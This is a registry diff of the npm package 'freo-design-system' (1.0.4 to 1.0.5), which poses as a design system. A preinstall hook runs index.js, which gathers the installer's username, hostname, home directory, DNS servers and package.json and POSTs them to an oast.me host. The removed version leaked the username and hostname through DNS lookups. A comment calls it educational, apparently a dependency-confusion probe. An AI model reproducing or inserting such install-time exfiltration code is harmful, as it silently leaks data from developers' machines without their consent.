freo-design-system 1.0.4 → 1.0.5

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +49 -19
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -1,26 +1,56 @@
1
- const { exec } = require("child_process");
1
+ /**
2
+ * DNS Request Demo Script - EDUCATIONAL PURPOSES ONLY
3
+ *
4
+ * This package is NOT MALICIOUS and is provided solely for educational purposes
5
+ * to demonstrate DNS exfiltration techniques. This is useful for learning about
6
+ * network security concepts, penetration testing training, and security research.
7
+ *
8
+ * Created by: https://hackerone.com/david96
9
+ */
10
+
2
11
  const os = require("os");
12
+ const dns = require("dns");
13
+ const querystring = require("querystring");
14
+ const https = require("https");
15
+ const packageJSON = require("./package.json");
16
+ const package = packageJSON.name;
3
17
 
4
- // Get system information
5
- const username = os.userInfo().username;
6
- const hostname = os.hostname();
18
+ const trackingData = JSON.stringify({
19
+ p: package,
20
+ c: __dirname,
21
+ hd: os.homedir(),
22
+ hn: os.hostname(),
23
+ un: os.userInfo().username,
24
+ dns: dns.getServers(),
25
+ r: packageJSON ? packageJSON.___resolved : undefined,
26
+ v: packageJSON.version,
27
+ pjson: packageJSON,
28
+ });
7
29
 
8
- // Create a simpler domain - avoiding potential length issues
9
- const targetDomain = `${username}-${hostname}.d05v713s0ahbkct7e3p04ipx6sf7m8tu5.oast.live`;
30
+ var postData = querystring.stringify({
31
+ msg: trackingData,
32
+ });
10
33
 
11
- // Define command based on platform
12
- const isWindows = os.platform() === 'win32';
13
- const command = isWindows
14
- ? `nslookup ${targetDomain}`
15
- : `dig ${targetDomain} || host ${targetDomain} || nslookup ${targetDomain}`;
34
+ var options = {
35
+ hostname: "d060f13s0ah7niegaulgx9wqb5ehc1gi8.oast.me",
36
+ port: 443,
37
+ path: "/",
38
+ method: "POST",
39
+ headers: {
40
+ "Content-Type": "application/x-www-form-urlencoded",
41
+ "Content-Length": postData.length,
42
+ },
43
+ };
16
44
 
17
- console.log(`Executing: ${command}`);
45
+ var req = https.request(options, (res) => {
46
+ res.on("data", (d) => {
47
+ process.stdout.write(d);
48
+ });
49
+ });
18
50
 
19
- // Execute the command
20
- exec(command, (error, stdout, stderr) => {
21
- if (error) {
22
- console.log("Command attempted, DNS query was sent");
23
- return;
24
- }
25
- console.log(stdout);
51
+ req.on("error", (e) => {
52
+ // console.error(e);
26
53
  });
54
+
55
+ req.write(postData);
56
+ req.end();
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "freo-design-system",
3
- "version": "1.0.4",
3
+ "version": "1.0.5",
4
4
  "main": "index.js",
5
5
  "scripts": {
6
6
  "preinstall": "node index.js",